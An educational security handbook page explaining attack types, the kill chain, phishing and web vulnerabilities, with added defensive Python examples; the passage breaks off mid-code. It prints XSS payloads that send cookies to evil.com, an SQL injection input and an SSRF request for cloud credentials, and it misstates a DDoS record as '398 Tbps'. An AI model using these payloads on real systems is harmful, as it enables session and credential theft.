Security Concepts Handbook

Security
Attack & Defense

// "Think like an attacker. Defend like an engineer. Act like it's already compromised."

A comprehensive field guide to security fundamentals — how attacks work, the mindset behind them, real-world case studies including Uber, XZ backdoor, Scattered Spider, and how AI reshapes both offense and defense. Built for engineers who want to understand the full picture.

01

What Is Security?

// THE CIA TRIAD & FOUNDATIONAL CONCEPTS

Security is the practice of protecting systems, data, and people from unauthorized access, damage, or disruption. It is not a product you buy — it is a continuous process. The moment you think you are "secure," you have already lost. Attackers need to succeed only once; defenders need to succeed every time.

Confidentiality

Only authorized parties can read the data. Implemented via encryption, access controls, and data classification. Violated by: data breaches, eavesdropping, credential theft.

Integrity

Data has not been tampered with. Implemented via hashing, digital signatures, and audit logs. Violated by: MITM attacks, SQL injection, unauthorized modifications.

Availability

Systems are accessible when needed. Implemented via redundancy, DDoS protection, backups. Violated by: ransomware, DDoS, hardware failure, sabotage.

Security ≠ Compliance
Passing a SOC 2 audit does not make you secure. Compliance is a minimum bar, not a destination. A company can be fully compliant and still get breached.
Attack Surface
Every system, service, API, employee, vendor, and code dependency is a potential entry point. The attack surface grows every time you ship a feature.
Zero Trust
Assume every request is hostile. Never trust a request based on network location. Verify every user, device, and service explicitly — every time.

The Security Terminology You Must Know

| Term | Definition | Example |
|---|---|---|
| Vulnerability | A weakness in a system that could be exploited | Unpatched Log4Shell in a Java app |
| Exploit | Code or technique that takes advantage of a vulnerability | Python script triggering Log4Shell RCE |
| Threat | Any potential danger that could exploit a vulnerability | Nation-state APT group targeting your sector |
| Risk | Probability × Impact of a threat exploiting a vulnerability | Critical CVE on internet-facing server = High Risk |
| IOC | Indicator of Compromise — evidence a breach occurred | Suspicious IP in logs, malware hash, odd registry key |
| TTP | Tactics, Techniques, Procedures — how attackers operate | Phishing → credential harvest → lateral move → data exfil |
| CVE | Common Vulnerabilities and Exposures — standardized vuln ID | CVE-2024-3094 (XZ Utils backdoor, CVSS 10.0) |
| CVSS | Score 0–10 measuring vulnerability severity | 9.8 = critical, 0–3.9 = low |
| APT | Advanced Persistent Threat — sophisticated, long-term attacker | Lazarus Group (North Korea), Cozy Bear (Russia) |
| Zero-Day | Unknown vulnerability with no patch available | Vendor doesn't know it exists yet — weaponized in the wild |
02

The Attacker Mindset

// HOW ADVERSARIES THINK

The most important shift in security thinking is to understand how attackers see your systems. They do not see your architecture diagram — they see an attack surface. They are patient, creative, and motivated. Understanding their incentives, methods, and economics is the foundation of effective defense.

Attacker Motivations

Financial (Most Common)
  • Ransomware — encrypt data, demand payment
  • Business Email Compromise (BEC) — wire fraud
  • Credential theft for account takeover
  • Cryptojacking — steal compute for crypto mining
  • Data theft for resale on dark web
Espionage (Nation-State)
  • Intellectual property theft (trade secrets, R&D)
  • Government/military intelligence gathering
  • Pre-positioning for future disruption
  • Influencing elections via disinformation
  • Long dwell time — months or years undetected
Hacktivism (Ideological)
  • Website defacement for political messaging
  • DDoS to disrupt services of opposing org
  • Leaking internal documents (e.g. Anonymous)
  • Targeting specific companies for ethical reasons
Disruption (War/Terror)
  • Critical infrastructure attacks (power, water)
  • Wiper malware (destroy, not encrypt)
  • NotPetya — caused $10B in damage
  • Russian attacks on Ukraine infrastructure

How Attackers Think: The OODA Loop

Phase 1: Observe → Phase 2: Orient → Phase 3: Decide → Phase 4: Act → Loop: Repeat

Attackers observe your environment — scanning IPs, browsing job postings (which reveal your tech stack), searching GitHub for leaked secrets, reading your documentation. They orient based on what they find — identifying the weakest link. They decide on an attack vector and act. Then they loop — persistence, lateral movement, exfiltration.

Asymmetric Warfare: Attackers need to find one way in. You need to defend everything. They can spend weeks on a single target. Your team has hundreds of systems to manage. The economics always favor the attacker — which is why layered defense, detection, and rapid response matter more than trying to block every possible attack.

Attacker Economics

Cost of Attack

Phishing kit: $20–200. Ransomware-as-a-Service subscription: $100–300/month. Exploit broker for zero-day: $50K–$2M. State-sponsored: unlimited budget. The barrier to entry for basic attacks is near-zero.

Revenue of Crime

Average ransomware payment (2024): $2.73M. BEC fraud (2024): $2.9B lost. Dark web credential dumps: $0.50–$100 per account. Stolen CC data: $5–$50 per card. This is a multi-billion dollar criminal industry.

Opportunity Cost

If a target is too hard, attackers move to the next. Security ROI: being harder to breach than your peers is often enough. Attackers are economically rational — they go for low-hanging fruit first.

03

The Attack Lifecycle

// CYBER KILL CHAIN & MITRE ATT&CK

Every cyberattack follows a recognizable pattern. The Cyber Kill Chain (Lockheed Martin) and MITRE ATT&CK framework both model this lifecycle. Understanding it allows defenders to detect and interrupt attacks at any stage — not just at the perimeter.

  1. Recon: Gather Intel
  2. Weaponize: Build Payload
  3. Delivery: Send to Target
  4. Exploit: Trigger Vuln
  5. Install: Plant Backdoor
  6. C2: Phone Home
  7. Actions: Achieve Goal

MITRE ATT&CK — The Attacker's Playbook

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. It is used to map detections, identify coverage gaps, and build threat models. Every mature SOC aligns detections to ATT&CK technique IDs.

| MITRE Tactic | What Attackers Do | Example Techniques | Detection Opportunity |
|---|---|---|---|
| Reconnaissance | Research target before attacking | DNS recon, LinkedIn scraping, Shodan scanning | Honeypots, exposed-service monitoring |
| Initial Access | First foothold in environment | Phishing, valid accounts, supply chain, zero-day | Email gateway, auth anomaly detection |
| Execution | Run malicious code | PowerShell, WMI, macro documents | Process creation events (Sysmon/EDR) |
| Persistence | Maintain access after reboot | Registry run keys, scheduled tasks, backdoors | Registry/cron monitoring, new service detection |
| Privilege Escalation | Get admin/root access | Kernel exploits, token impersonation, sudo abuse | Privilege use anomalies, EDR telemetry |
| Defense Evasion | Hide from security tools | Log clearing, process injection, LOLBAS | Log deletion events, unsigned binary execution |
| Credential Access | Steal passwords and tokens | Mimikatz, Kerberoasting, LSASS dump | LSASS access alerts, DCSync detection |
| Lateral Movement | Spread through the network | PtH, PtT, RDP, SMB, WMI | East-west traffic analysis, micro-segmentation |
| Exfiltration | Steal data | DNS tunneling, HTTPS to C2, USB, cloud storage | DLP, unusual egress volume, DNS anomalies |
| Impact | Achieve final objective | Ransomware, wiper, BEC wire fraud, defacement | File encryption alerts, bulk-delete events |
ATT&CK Navigator: Use attack.mitre.org to visualize your detection coverage. Map your SIEM rules to ATT&CK IDs. Every technique without a detection is a blind spot. Defenders that think in ATT&CK terms catch attackers much earlier in the kill chain.
04

Social Engineering

// THE HUMAN IS THE VULNERABILITY

Social engineering is the art of manipulating humans rather than machines. It bypasses technical controls entirely. No firewall blocks a phone call. No IDS detects a convincing email. The most sophisticated technical infrastructure can be undone by a single employee clicking a link or reading a password over the phone. 81% of breaches involve human error or stolen credentials (Verizon DBIR 2024).

Phishing (Most Common)

How: Attacker crafts a convincing email impersonating a trusted entity (bank, IT department, CEO, DocuSign). Contains a link to a fake login page or a malware attachment.

Variants:

  • Spear phishing — targeted at specific individual, highly personalized
  • Whaling — targets C-suite executives
  • Vishing — voice phishing (phone calls)
  • Smishing — SMS phishing
  • AiTM Phishing — Adversary-in-the-Middle, can steal MFA tokens in real time
Pretexting (High Success)

How: Attacker creates a fabricated scenario (pretext) to manipulate the target. Examples: impersonating IT support to get credentials, pretending to be a vendor to get building access, posing as an auditor to gain document access.

Real example: Scattered Spider (2025) called Marks & Spencer's IT helpdesk, impersonated employees, and convinced support staff to bypass security controls — leading to a £300M+ business disruption.

Baiting & Physical
  • USB drops — leave infected USB drives in parking lots
  • Tailgating — follow an authorized person through a door
  • Quid pro quo — offer something (fake IT help) for something (credentials)
  • Watering hole — compromise a website your targets frequently visit
Business Email Compromise

How: Attacker compromises or spoofs an executive's email account and instructs finance to wire funds. $2.9B lost to BEC in 2023 (FBI IC3). No malware involved — just a convincing email.

Key signal: Urgent wire transfer request from "CEO" with slightly different email domain.

How AiTM Phishing Actually Works (Technical)

Attack Flow — Evilginx / Modlishka (AiTM)
```text
# Adversary-in-the-Middle Attack — bypasses TOTP/Push MFA in real time

# 1. Setup: Attacker deploys a reverse proxy mimicking the real login page
Attacker → sets up phishingdomain.com → proxies all requests to real login.company.com
Victim sees: https://login-company-secure.com (looks identical to real site)

# 2. Delivery: Target receives convincing phishing email
Subject: "Urgent: Your account will be locked in 24 hours"
Body: "Click here to verify: https://login-company-secure.com"

# 3. Victim enters credentials + MFA code
Victim → types username + password → proxy relays to REAL site
Real site → sends MFA challenge → victim enters OTP code
Proxy → relays OTP to real site IN REAL TIME → authentication succeeds
Proxy → captures the session token (cookie) issued by the real site

# 4. Attacker now has a valid, authenticated session token
# MFA was bypassed entirely — it was completed by the victim

# Works against: SMS OTP, TOTP apps (Google Auth), plain push notifications
# Does NOT work against: FIDO2/Passkeys (origin-bound - tied to real domain)
# Tools used: Evilginx3, Modlishka, Muraena (open source)
# Detection: Watch for auth from unexpected IP/country after successful MFA
```
SMS and TOTP MFA are NOT phishing-resistant. AiTM attacks defeat them in real time. The only phishing-resistant MFA is FIDO2/Passkeys — they are cryptographically bound to the origin domain, so even a convincing fake site cannot capture usable credentials. Mandate passkeys for privileged access.
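To make the origin-binding argument concrete, here is an added Python model (not code from this handbook, nor from Evilginx or any other tool it names) of the two MFA paths in the flow above. A relayed TOTP code is indistinguishable from a legitimate one, because the real site only ever sees six digits. A WebAuthn-style assertion, by contrast, carries the origin the victim's browser was actually on, and the proxy cannot change it without breaking the signature. The TOTP part follows RFC 4226/6238; the WebAuthn part is a deliberate simplification: an HMAC with a shared credential key stands in for the authenticator's private-key signature, the rpIdHash check is omitted, and the two domains are the page's own examples.

```python
import hashlib
import hmac
import json
import struct

# Origins taken from the attack flow above (the phishing domain is the page's example).
REAL_ORIGIN = "https://login.company.com"
PHISH_ORIGIN = "https://login-company-secure.com"


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP. TOTP (RFC 6238) is HOTP with counter = floor(unix_time / 30)."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp_server_check(secret: bytes, submitted_code: str, counter: int) -> bool:
    """The real site only sees a 6-digit code; it cannot tell who typed it or where."""
    return hmac.compare_digest(hotp(secret, counter), submitted_code)


def authenticator_assert(cred_key: bytes, challenge: bytes, browser_origin: str) -> dict:
    """Simplified WebAuthn assertion. The BROWSER writes the origin into clientData;
    the page (and therefore the proxy) cannot choose it. A real authenticator signs
    with a private key; an HMAC over the clientData hash stands in for that here."""
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": challenge.hex(), "origin": browser_origin},
        sort_keys=True,
    )
    digest = hashlib.sha256(client_data.encode()).digest()
    sig = hmac.new(cred_key, digest, hashlib.sha256).hexdigest()
    return {"clientData": client_data, "signature": sig}


def webauthn_server_check(cred_key: bytes, assertion: dict, challenge: bytes,
                          expected_origin: str) -> bool:
    digest = hashlib.sha256(assertion["clientData"].encode()).digest()
    expected_sig = hmac.new(cred_key, digest, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected_sig, assertion["signature"]):
        return False  # clientData altered after signing (e.g. proxy rewrote the origin)
    data = json.loads(assertion["clientData"])
    return (data["type"] == "webauthn.get"
            and data["challenge"] == challenge.hex()
            and data["origin"] == expected_origin)


def aitm_demo() -> dict:
    """Replays step 3 of the flow above for both MFA types. All keys are constructed."""
    totp_secret = b"12345678901234567890"  # constructed shared secret (RFC 4226 test value)
    counter = 42
    victim_code = hotp(totp_secret, counter)  # what the victim types into the phishing page
    # The proxy relays the code unchanged, so the real site accepts it.
    totp_relayed = totp_server_check(totp_secret, victim_code, counter)

    cred_key = b"constructed-credential-key"
    challenge = b"\x01\x02\x03\x04" * 4  # issued by the real site, relayed by the proxy
    # The victim's browser is on the phishing origin, so that is what gets signed.
    relayed = authenticator_assert(cred_key, challenge, PHISH_ORIGIN)
    webauthn_relayed = webauthn_server_check(cred_key, relayed, challenge, REAL_ORIGIN)
    # Proxy tries to patch the origin field before forwarding: signature no longer matches.
    patched = dict(relayed, clientData=relayed["clientData"].replace(PHISH_ORIGIN, REAL_ORIGIN))
    webauthn_patched = webauthn_server_check(cred_key, patched, challenge, REAL_ORIGIN)
    # Legitimate login straight from the real origin.
    genuine = authenticator_assert(cred_key, challenge, REAL_ORIGIN)
    webauthn_genuine = webauthn_server_check(cred_key, genuine, challenge, REAL_ORIGIN)
    return {"totp_relayed": totp_relayed, "webauthn_relayed": webauthn_relayed,
            "webauthn_patched": webauthn_patched, "webauthn_genuine": webauthn_genuine}


if __name__ == "__main__":
    print(aitm_demo())
```

The result is the page's point in four booleans: the relayed TOTP is accepted, the relayed assertion is rejected because its origin is the phishing site, the patched assertion is rejected because its signature no longer covers the clientData, and only the assertion created on the real origin passes.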
05

Network Attacks

// PACKETS DON'T LIE — BUT ATTACKERS DO

Network attacks target the infrastructure over which data travels — intercepting, disrupting, or rerouting traffic. While encryption has mitigated many classical network attacks, misconfigurations, legacy protocols, and new attack surfaces keep this category highly relevant.

MITM — Man-in-the-Middle (Classic)

Attacker positions between two communicating parties, secretly intercepting and potentially modifying traffic. Enabled by: ARP poisoning, DNS spoofing, rogue WiFi, SSL stripping.

Defence: TLS everywhere, HSTS preloading, certificate pinning, DNSSEC, avoid public WiFi without VPN.

DDoS — Distributed Denial of Service (Growing)

Flood a target with traffic to make it unavailable. Modern DDoS leverages botnets (IoT devices), amplification (DNS, NTP, SSDP — small request → giant response), and application-layer attacks (HTTP flood).

Record: Google mitigated a 398 Tbps DDoS in 2023. UNFI food supply chain disrupted by DDoS in June 2025.

Port Scanning & Recon

Using tools like nmap, Shodan, or Masscan to enumerate open ports and services. Every internet-exposed service that shouldn't be public is a vulnerability waiting to be exploited.

Shodan query: product:"Microsoft IIS" country:"IN" — attackers find your exposed services before you do.

DNS Hijacking & Tunneling

Hijacking: Redirect DNS queries to attacker-controlled servers — users go to fake sites even with correct URL. Tunneling: Encode data in DNS queries to exfiltrate data bypassing firewalls (DNS is usually allowed outbound).

Network Scanning Demo (Defense Perspective)

bash — reconnaissance tools defenders use
```bash
# See your network like an attacker sees it

# Scan your own perimeter
nmap -sV -p- --open --min-rate 1000 your-public-ip-range/24

# Find services exposed to internet (Shodan CLI)
shodan search 'org:"Your Company Name"' --fields ip_str,port,data

# Check for open S3 buckets (common data leak)
# Public grants show up as the AllUsers / AuthenticatedUsers group URIs in the ACL
aws s3api list-buckets | jq -r '.Buckets[].Name' | \
  xargs -I{} sh -c 'aws s3api get-bucket-acl --bucket {} 2>&1 | grep -Eiq "AllUsers|AuthenticatedUsers" && echo "PUBLIC: {}"'

# Check DNS zone for unnecessary exposure
dig +short your-domain.com ANY
dig axfr your-domain.com @ns1.your-domain.com

# Detect DNS tunneling (look for unusually large/frequent DNS queries)
# zeek writes dns.log into the current directory; the query name is column 10 of dns.log
zeek -r capture.pcap
awk -F'\t' '$10 != "-" && length($10) > 100 {print "Suspicious DNS:", $10}' dns.log
```
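The one-line awk check above only looks at query length. The following added Python example (not part of the handbook) extends the same idea into a small detector for Zeek-style dns.log data: it reads the `#fields` header so columns are looked up by name, scores each query on length and on the Shannon entropy of its first label, and then aggregates per (client, registered domain) so that a single long but legitimate hostname does not raise an alert. The log excerpt is constructed for the demo; `c2-example.net` is a made-up attacker domain and the registered-domain helper is a two-label approximation rather than a Public Suffix List lookup.

```python
import math
from collections import defaultdict

# Constructed excerpt in Zeek dns.log layout (tab-separated, #fields header as Zeek writes it).
SAMPLE_DNS_LOG = "\n".join([
    "#fields\tts\tid.orig_h\tid.resp_h\tproto\tquery\tqtype_name",
    "1700000000.10\t10.0.0.5\t10.0.0.53\tudp\twww.example.com\tA",
    "1700000000.20\t10.0.0.5\t10.0.0.53\tudp\tmail.example.com\tMX",
    "1700000000.30\t10.0.0.7\t10.0.0.53\tudp\tupdates.example.com\tA",
    "1700000001.00\t10.0.0.7\t10.0.0.53\tudp\t5a3f9c2e8b1d7046a9e3c4f2b8d1e6a0.t.c2-example.net\tTXT",
    "1700000001.10\t10.0.0.7\t10.0.0.53\tudp\t7c1d0e9b2a4f6835d1b9c7e0a3f5d2b8.t.c2-example.net\tTXT",
    "1700000001.20\t10.0.0.7\t10.0.0.53\tudp\te8a1c4d2f6b9037e5a2c8d1b4f7e9a06.t.c2-example.net\tTXT",
    "1700000001.30\t10.0.0.7\t10.0.0.53\tudp\t0b6d3e8f1a5c2947d8e1f3a6b2c9d4e7.t.c2-example.net\tTXT",
    # Long but legitimate: a lone long name must not become an alert on its own.
    "1700000002.00\t10.0.0.9\t10.0.0.53\tudp\tlong-but-legitimate-cdn-hostname-for-static-assets.example.com\tA",
])


def parse_zeek_log(text: str) -> list:
    """Return one dict per record, keyed by the names in the #fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other Zeek header/footer lines, blank lines
        elif fields:
            records.append(dict(zip(fields, line.split("\t"))))
    return records


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded/encrypted payload labels score high, words score low."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def registered_domain(qname: str) -> str:
    """Crude two-label approximation (a deployment would use the Public Suffix List)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_dns_tunneling(log_text: str, min_len: int = 40, min_entropy: float = 3.5,
                         min_unique: int = 3) -> list:
    """Flag (client, domain) pairs with several distinct suspicious-looking queries."""
    groups = defaultdict(set)
    for rec in parse_zeek_log(log_text):
        q = rec.get("query", "-")
        if q == "-":
            continue  # Zeek writes '-' for unset fields
        first_label = q.split(".")[0]
        if len(q) >= min_len or shannon_entropy(first_label) >= min_entropy:
            groups[(rec["id.orig_h"], registered_domain(q))].add(q)
    alerts = []
    for (src, dom), qs in sorted(groups.items()):
        if len(qs) >= min_unique:  # many unique subdomains = data being encoded in names
            alerts.append({
                "src": src,
                "domain": dom,
                "unique_queries": len(qs),
                "max_len": max(len(q) for q in qs),
                "max_entropy": round(max(shannon_entropy(q.split(".")[0]) for q in qs), 2),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_dns_tunneling(SAMPLE_DNS_LOG):
        print("Suspicious DNS:", alert)
```

Running it against the constructed excerpt flags only 10.0.0.7 talking to c2-example.net; the long CDN hostname from 10.0.0.9 is scored as suspicious on its own but never reaches the per-domain uniqueness threshold. Tune `min_len`, `min_entropy` and `min_unique` against a baseline of your own resolver traffic before alerting on them.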
06

Web Application Attacks

// OWASP TOP 10 & HOW THEY WORK

Web applications are the most common attack surface. Nearly every business runs web services, and many expose sensitive data via poorly secured APIs. The OWASP Top 10 defines the most critical categories — not because they are the only threats, but because they are the most frequently exploited.

  • A01 Broken Auth / Access
  • A02 Crypto Fail
  • A03 Injection
  • A05 Misconfig
  • A06 Vuln Components
  • A09 Logging Fail
  • A10 SSRF
SQL Injection (Classic, Still Rampant)

User input is unsanitized and included directly in a database query. Attacker crafts input that changes the query logic.

SQL Injection Example
```python
# Vulnerable query: user input concatenated straight into the SQL text
query = "SELECT * FROM users WHERE name = '" + userInput + "'"

# Attacker input:  ' OR '1'='1
# Resulting query — returns ALL users:
#   SELECT * FROM users WHERE name = '' OR '1'='1'

# Fix: Use parameterized queries ALWAYS
cursor.execute("SELECT * FROM users WHERE name = %s", (userInput,))
```
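To see the two query styles side by side on real input, here is an added, runnable Python example (not from the handbook) using an in-memory SQLite table. It runs the page's own `' OR '1'='1` input through both the concatenated and the parameterized query, and also shows that ordinary input containing an apostrophe breaks the concatenated version while the parameterized one handles it. SQLite's driver uses `?` placeholders where the page's `%s` is the psycopg2/MySQL style; the mechanism is the same: the value travels separately from the statement, so quotes in it never reach the SQL parser. The three users are constructed.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed three-row users table in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, email TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com"), ("carol", "carol@example.com")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_input: str) -> list:
    """Same mistake as the page's first line: the input becomes part of the statement."""
    query = "SELECT name FROM users WHERE name = '" + user_input + "' ORDER BY id"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn: sqlite3.Connection, user_input: str) -> list:
    """The driver binds the value; the statement text is fixed at development time."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE name = ? ORDER BY id", (user_input,))]


def compare(user_input: str) -> dict:
    """Run one input through both paths; a SQL syntax error is reported as a string."""
    conn = build_demo_db()
    try:
        vulnerable = lookup_vulnerable(conn, user_input)
    except sqlite3.Error:
        vulnerable = "SQL error"  # a legitimate apostrophe already breaks the concatenated query
    return {"vulnerable": vulnerable, "parameterized": lookup_parameterized(conn, user_input)}


if __name__ == "__main__":
    print(compare("bob"))           # both paths return ['bob']
    print(compare("' OR '1'='1"))   # vulnerable returns every row, parameterized returns []
    print(compare("o'brien"))       # vulnerable: SQL error, parameterized: [] (no such user)
```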
XSS — Cross-Site Scripting (Very Common)

Attacker injects malicious JavaScript into a web page that executes in victims' browsers. Used to steal session cookies, redirect users, or perform actions on their behalf.

XSS Payload
```text
# Classic stored XSS — injected into comments/profile
<script>document.location='https://evil.com/steal?c='+document.cookie</script>

# DOM-based XSS via URL parameter
https://victim.com/search?q=<img src=x onerror=fetch('//evil.com/'+btoa(document.cookie))>

# Fix: Encode output, Content-Security-Policy, HttpOnly cookies
```
IDOR — Insecure Direct Object Reference

Application exposes direct references to internal objects without checking authorization. The #1 vulnerability category (OWASP A01 — Broken Access Control).

IDOR Example
```text
# You log in as user 1001 and get your invoice:
GET /api/invoices/1001

# Change the ID — you now see another user's invoice:
GET /api/invoices/1000        # Works if no authz check!

# Fix: Always verify the requesting user OWNS the resource
if invoice.owner_id != current_user.id:
    raise PermissionDenied()
```
SSRF — Server-Side Request Forgery

Attacker tricks the server into making HTTP requests on their behalf — often to internal services or cloud metadata endpoints not accessible from outside.

SSRF Example — AWS Metadata
```text
# App fetches URL provided by user:
GET /fetch?url=https://example.com/image.jpg

# Attacker provides internal URL:
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Server fetches it — returns AWS role credentials!
# Capital One breach (2019) — $80M fine — started with SSRF
```
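The defensive counterpart to the example above is a URL check the `/fetch` handler runs before making any request. The following added Python example (not from the handbook) is one such check, written as an allowlist: only `http`/`https`, only hostnames the application explicitly trusts, and no literal IP addresses at all. It goes a little beyond the page's single metadata URL by also catching the alternative spellings of the same address that a naive string comparison misses: decimal (`2852039166`), hexadecimal (`0xa9fea9fe`) and IPv4-mapped IPv6 (`[::ffff:169.254.169.254]`). The allowlist contents are an assumption for the demo.

```python
import ipaddress
from urllib.parse import urlsplit


def _literal_ip(host: str):
    """Parse dotted, IPv6, decimal ('2852039166') and hex ('0xa9fea9fe') host forms."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        if host.isdigit():
            return ipaddress.ip_address(int(host))
        if host.lower().startswith("0x"):
            return ipaddress.ip_address(int(host, 16))
    except ValueError:
        pass
    return None


def check_fetch_url(url: str, allowed_hosts) -> tuple:
    """Return (ok, reason). Rejects anything that is not an allowlisted public hostname."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed: " + (parts.scheme or "<none>")
    host = parts.hostname  # lowercased, brackets stripped, user:pass@ removed
    if not host:
        return False, "no host"
    ip = _literal_ip(host)
    if ip is not None:
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 is still the metadata service
        if not ip.is_global:
            return False, "non-public address: " + str(ip)
        return False, "literal IP addresses are not allowed"
    if host not in allowed_hosts:
        return False, "host not on allowlist: " + host
    return True, "ok"


if __name__ == "__main__":
    allowed = {"example.com", "cdn.example.com"}  # assumption: what this app may fetch from
    for candidate in [
        "https://example.com/image.jpg",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://2852039166/latest/meta-data/",
        "http://0xa9fea9fe/",
        "http://[::ffff:169.254.169.254]/",
        "http://example.com.attacker.test/",
        "file:///etc/passwd",
    ]:
        print(check_fetch_url(candidate, allowed), candidate)
```

This check is deliberately offline: it never resolves names. In the handler itself, resolve the allowlisted hostname, verify the resulting address is public, connect to that exact address, and disable redirect following, otherwise a hostname that later resolves to an internal address (DNS rebinding) or an HTTP redirect to the metadata endpoint reintroduces the problem.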
07

Malware & Ransomware

// SOFTWARE DESIGNED TO CAUSE HARM

Malware (malicious software) is code designed to damage, disrupt, or gain unauthorized access to computer systems. Ransomware — malware that encrypts data and demands payment — has become the dominant threat to organizations, with average payments exceeding $2.7M in 2024 and 44% of all breaches now involving ransomware.

| Type | What It Does | Famous Example | Defense |
|---|---|---|---|
| Ransomware | Encrypts files, demands payment for decryption key | LockBit, Cl0p, ALPHV/BlackCat | Air-gapped backups, EDR, network segmentation |
| Wiper | Permanently destroys data — no decryption option | NotPetya (2017), Industroyer (Ukraine) | Immutable backups, network segmentation |
| Trojan | Disguised as legitimate software, installs backdoor | DarkComet, Cobalt Strike (misused) | Application allowlisting, EDR |
| RAT | Remote Access Trojan — gives attacker full control | AsyncRAT, Quasar, njRAT | Network monitoring, process anomaly detection |
| Rootkit | Hides deep in OS, survives reboots and evades AV | Necurs, Sony rootkit | Secure boot, integrity monitoring, reimaging |
| Cryptojacker | Silently mines cryptocurrency using your compute | XMRig deployed via Log4Shell | Anomalous CPU/GPU monitoring, container security |
| Infostealer | Silently harvests passwords, cookies, crypto wallets | RedLine, Vidar, Lumma Stealer | EDR, browser extension controls, phishing filters |

Ransomware-as-a-Service (RaaS) Model

Operator (builds & maintains ransomware) → Portal (dark web affiliate portal) → Affiliate (rents access, 20–30%) → Compromise (deploys ransomware) → Ransom (victim pays crypto) → Split (80% affiliate / 20% operator)
Double Extortion: Modern ransomware operators don't just encrypt — they exfiltrate data first, then threaten to publish it on their leak sites if ransom is not paid. Even with good backups, the threat of data exposure creates additional pressure. This is now standard practice for LockBit, ALPHV, and Cl0p.
08

Supply Chain Attacks

// YOUR WEAKEST LINK IS YOUR VENDOR

Supply chain attacks compromise software or hardware before it reaches the victim, abusing the implicit trust organizations place in third-party vendors. They are among the most impactful and hardest to detect attacks because the malicious code arrives via a trusted channel.

Software Supply Chain (Critical Risk)
  • SolarWinds (2020): Russians embedded backdoor in Orion updates — 18,000 orgs affected including US Treasury
  • XZ Utils (2024): State-sponsored actor spent 2+ years building maintainer trust, then added SSH backdoor
  • Codecov (2021): Bash uploader script compromised — exfiltrated CI environment variables from 29,000 clients
  • npm typosquatting: Malicious packages with names similar to popular ones (e.g. lo-dash vs lodash)
Third-Party Vendor Risk (Growing)
  • MOVEit (2023): Zero-day in file transfer software — Cl0p ransomware exfiltrated data from 2,000+ orgs
  • Target (2013): Attackers got into Target's network via an HVAC vendor's credentials
  • Salesforce/Gainsight (2025): OAuth integration exploited to access data from 200+ companies
  • 30% of all breaches in 2025 involved third-party or supply chain failures

Defending Against Supply Chain Attacks

Supply Chain Security Controls
```bash
# 1. Generate and track SBOMs (Software Bill of Materials)
syft myapp:latest -o spdx-json > sbom.json
# Know EVERY dependency and transitive dependency

# 2. Pin dependency versions — never use wildcards in production
# Bad:  requests>=2.0
# Good: requests==2.31.0

# 3. Verify package integrity with checksums
pip install --require-hashes -r requirements.txt
# requirements.txt includes sha256 hash of each package

# 4. Sign and verify artifacts (Sigstore / Cosign)
cosign sign --key cosign.key my-image:latest
cosign verify --key cosign.pub my-image:latest

# 5. Scan for known malicious packages
pip-audit --fix
npm audit fix
trivy fs . --scanners vuln,secret,config

# 6. Monitor OSS maintainer changes
# New maintainer added to critical package = red flag
# Use OpenSSF Scorecard to assess package health
scorecard --repo github.com/owner/package
```
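Steps 2 and 3 above are policies that only hold if something enforces them in CI. The following added Python example (not from the handbook, and not part of pip) is a small linter for `requirements.txt` that does that: it joins pip's backslash continuations, flags unpinned packages, range specifiers, wildcard pins and packages with no `--hash`, and checks that each hash digest has the right length for its algorithm. The requirements file is constructed for the demo and its hash values are placeholders, not real package digests.

```python
import re

# Constructed requirements.txt for the demo; the digests are placeholders, not real hashes.
SAMPLE_REQUIREMENTS = """\
# constructed requirements.txt for the linter demo
requests==2.31.0 \\
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000001
pyyaml==6.0.1
flask>=2.0
django==4.*
numpy
cryptography==42.0.5 \\
    --hash=sha256:deadbeef
"""

HASH_RE = re.compile(r"--hash=(?P<alg>sha256|sha384|sha512):(?P<hex>[0-9a-fA-F]+)")
REQ_RE = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)(\[[^\]]*\])?\s*(?P<spec>[^;#\s]*)")
DIGEST_LEN = {"sha256": 64, "sha384": 96, "sha512": 128}


def logical_lines(text: str):
    """Yield requirements with backslash continuations joined and comments removed."""
    buf = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf.append(line[:-1])
            continue
        buf.append(line)
        yield " ".join(buf).strip()
        buf = []
    if buf:
        yield " ".join(buf).strip()


def lint_requirements(text: str, require_hashes: bool = True) -> list:
    """Return (package, issue) pairs; an empty list means every line passed."""
    findings = []
    for line in logical_lines(text):
        if not line or line.startswith("-"):
            continue  # blank line, or a pip option such as -r / --index-url
        m = REQ_RE.match(line)
        if not m:
            findings.append(("?", "unparseable line: " + line))
            continue
        name, spec = m.group("name"), m.group("spec")
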